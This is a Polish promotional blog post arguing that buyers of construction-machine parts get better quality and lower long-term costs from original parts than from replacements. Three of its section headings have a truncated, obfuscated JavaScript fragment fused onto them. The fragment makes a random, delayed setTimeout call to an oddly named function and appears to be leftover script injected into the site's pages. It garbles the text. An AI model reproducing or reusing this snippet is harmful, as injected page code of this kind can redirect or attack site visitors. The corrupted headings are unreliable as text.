Dlaczego warto kupować oryginalne części do maszyn zamiast zamienników?

serwis maszyn budowlanych

Wielu przedsiębiorców stając przed koniecznością zakupu zepsutych części do maszyn budowlanych staje przed dylematem, czy zaopatrzyć się w nową, oryginalną, czy może jednak postawić na zamiennik. Kwestia wyboru pozostaje nierozstrzygnięta, a zakup następuje często bez zastanowienia. Postanowiliśmy pomóc wam w rozwiązaniu tego dylematu i powiedzieć, dlaczego warto postawić na oryginalne części.

Postaw na jakośćandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

Prędzej, czy później awaria pojawi się w każdym eksploatowanym urządzeniu. Może być to zarówno poważna usterka, jak i drobna awaria. To naturalna kolej rzeczy, iż części do maszyn budowlanych zużywają się podczas pracy. Wówczas konieczna jest wymiana zużytej na nową, by maszyna szybko wróciła do pracy. Pierwszą sprawą o jakiej musisz pomyśleć zanim zdecydujesz się na zakup nowej części, jest jej jakość. Musisz wiedzieć, że żaden zamiennik nie zastąpi Ci oryginalnej części i zawsze będzie w gorszej jakości niż oryginał. Kupowanie zamienników może być więc ryzykowne, a co gorsza może narazić się na dodatkowe koszta…

Szukając części do swojej maszyny, warto abyś pamiętał iż wiele firm produkujących maszyny budowlane nie wykonuje do nich wszystkich podzespołów. Dlatego też sprawdź, czy zepsuta część nie jest wyprodukowana przez inną firmę. Jeśli tak, warto kupić właśnie część tego producenta, niż stawiać na oryginalną część z logo producenta całej maszyny. Gwarantujesz sobie wówczas, iż zakup będzie i trafny i oryginalny, a jakość Twojej maszyny budowlanej pozostanie niezmieniona, co ma kolosalne znaczenie zwłaszcza w przypadku wysokiej klasy urządzeń.

serwis maszyn budowlanych

Oszczędność, czy podwójny wydatek?andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

Zanim zdecydujesz się sięgnąć po zamiennik, zastanów się, czy jesteś pewien jego jakości. Choć zamienniki bywają znacznie tańsze od oryginalnych części, w wielu przypadkach okazuje się, że jest to zakup zupełnie chybiony i przynoszący dodatkowe straty. Po pierwsze oszczędności jakie można poczynić kupując zamiennik są z reguły wyłącznie pozorne, bowiem zamienniki są o wiele bardziej awaryjne, co powoduje kolejne przestoje w pracy maszyny i straty finansowe dla firmy budowlanej. Po drugie szybciej się zużywają i wymagają kolejnych wymian, co również generuje dodatkowe koszty. Przed zakupem części, trzeba więc pamiętać, że podobnie jak w przypadku maszyny budowlanej, także i części do nich to inwestycja, która się opłaca i która przynieść ma zyski. Markowy sprzęt oraz markowe części psują się znacznie rzadziej, co pozwala na przyjmowanie zleceń budowlanych z wykorzystaniem posiadanego sprzętu, a to generuje zarobek.

Wydajność równa się skutecznośćandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

Każdy, kto miał styczność ze sprzętem budowlanym zdaje sobie sprawę, że im bardziej wydajna jest maszyna i sprawne jej elementy, tym bardziej skuteczna jest wykonywana praca. Inwestowanie w słabe, tanie i niesprawdzone zamienniki to loteria i spore ryzyko, które może doprowadzić do poważnych strat finansowych. Dlaczego oryginalne części są lepsze? Bo przechodzą one bardzo rygorystyczne kontrole jakości, dzięki którym zyskujemy pewność, iż działać będą skutecznie i niezawodnie przez długi czas, a w razie jakichkolwiek awarii liczyć możemy na błyskawiczny serwis lub ich wymianę. Ich zakup, to również pewność, iż pasowały będą do posiadanej maszyny, z którą będą w pełni kompatybilne. Oryginały bezwzględnie dobrze jest stosować w przypadku dużych awarii oraz w przypadku znaczących części typu układy hydrauliczne.

Jeśli koniecznie musimy postawić na zamiennik, w przypadku niektórych elementów jest to ryzyko nieopłacalne, dlatego każdorazowo warto dobrze przemyśleć zakup takiego elementu. Sprawdzone, solidne i dobrze pracujące oryginały, to gwarancja, iż maszyna przy prawidłowej eksploatacji służyć będzie bezawaryjnie i generować zyski. A przecież właśnie o to chodzi w każdym biznesie.

Miejsce na Twoją reklamę